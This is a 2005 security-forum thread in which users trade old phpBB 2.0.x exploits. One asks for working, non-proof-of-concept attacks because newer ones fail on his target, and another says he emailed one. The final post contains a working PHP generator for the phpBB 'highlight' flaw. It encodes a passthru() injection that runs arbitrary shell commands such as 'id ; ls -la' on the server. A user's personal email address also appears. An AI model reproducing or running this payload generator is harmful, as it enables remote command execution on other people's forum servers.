|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 72
Members: 0
Total: 72
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
phpbb 2.0.4 or 2.0.3 anybody got.... |
|
Posted: Fri Mar 18, 2005 11:28 am |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
Anbody got an old 2.0.3 or 2.0.4 exploit sitting around amongst those piles of exploits? I dont really feel like looking through mountains of archives and Databases so Ill just ask the good(cough) people of Waraxe.us |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
Posted: Sat Mar 19, 2005 12:26 pm |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
i have !!!
phpbb 2.0.4 <-- use for test viewtopic.php and otehrs bug
give me an email , so i can send it to you
or u can donlod it form phpbb.sourceforge.net
<but i guest the packet allready patched> |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
Posted: Mon Mar 21, 2005 5:05 am |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
FYI , the philes still leave unpatch
coz ive download the 2.0.11 for doin some testing |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
Posted: Mon Mar 21, 2005 11:26 am |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
My email is shown in my profile but here it is anyway: zebcarnell@gmail.com I need older ones because the sessions/cookies have been changed a lot since 2.0.3 and newer exploits dont work so well. I need some thing that isnt PERL or C++ and it cant be proof of concept. Ive tried the highlighter issue but that doesnt work either. If you can help it would be great. |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
|
|
|
|
Posted: Mon Mar 21, 2005 2:09 pm |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
shai-tan wrote: | My email is shown in my profile but here it is anyway: zebcarnell@gmail.com I need older ones because the sessions/cookies have been changed a lot since 2.0.3 and newer exploits dont work so well. I need some thing that isnt PERL or C++ and it cant be proof of concept. Ive tried the highlighter issue but that doesnt work either. If you can help it would be great. |
ok,
btw i wrote some paper about highlighter , you can check it at http://geocities.com/paperecho/phpbbworm-eng.pdf
i hope i can email it to you.
coz my b/w its so small ..
FYI im using GPRS |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
Posted: Tue Mar 22, 2005 12:15 pm |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
Ill download it.
But Highlighter doesnt work with a SQL 2000 db as far as Im aware.
Thats why I need someone to did up an old xploit they might have that works.
Thanks though [/u] |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
Posted: Tue Mar 22, 2005 2:11 pm |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
yupe. ive allready sent the phpbb 2.0.4 to your email , cek it
hope u enjoy it :LOL: |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
Posted: Wed Mar 23, 2005 10:04 am |
|
|
shai-tan |
Valuable expert |
|
|
Joined: Feb 22, 2005 |
Posts: 477 |
|
|
|
|
|
|
|
Yeah thanks man....
Its kinda hard to find reliable old exploits around these days |
|
_________________ Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
Posted: Wed Mar 23, 2005 3:24 pm |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
shai-tan wrote: | Yeah thanks man....
Its kinda hard to find reliable old exploits around these days |
NOPE .. hope it helpz you much |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
Passing Spaces |
|
Posted: Tue Apr 05, 2005 4:19 pm |
|
|
kingspice |
Beginner |
|
|
Joined: Apr 05, 2005 |
Posts: 2 |
|
|
|
|
|
|
|
y3dips, just dropped u a pm.
Problem is I, can't seem to work out how to pass spaces
e.g uname -a
Anybody able to do so?
Ta
Kingspice |
|
|
|
|
|
Re: Passing Spaces |
|
Posted: Wed Apr 06, 2005 6:13 am |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
kingspice wrote: | y3dips, just dropped u a pm.
Problem is I, can't seem to work out how to pass spaces
e.g uname -a
Anybody able to do so?
Ta
Kingspice |
ive allready read your pm. n i answer it too.
by the way, paperthat i wrote just some POC,
so if u need some space or a long command, u cant use RUSH security team php script to generate it , coz it used another variable included
Code: | <?
$rush='id ; ls -la'; //do what
$highlight='passthru($HTTP_GET_VARS[rush])'; // dont touch
print "?t=%37&rush=";
for ($i=0; $i<strlen($rush); ++$i) {
print '%' . bin2hex(substr($rush,$i,1));
}
print "&highlight=%2527.";
for ($i=0; $i<strlen($highlight); ++$i) {
print '%' . bin2hex(substr($highlight,$i,1));
}
print ".%2527";
?>
|
see "rush" variable ?
thats the key |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|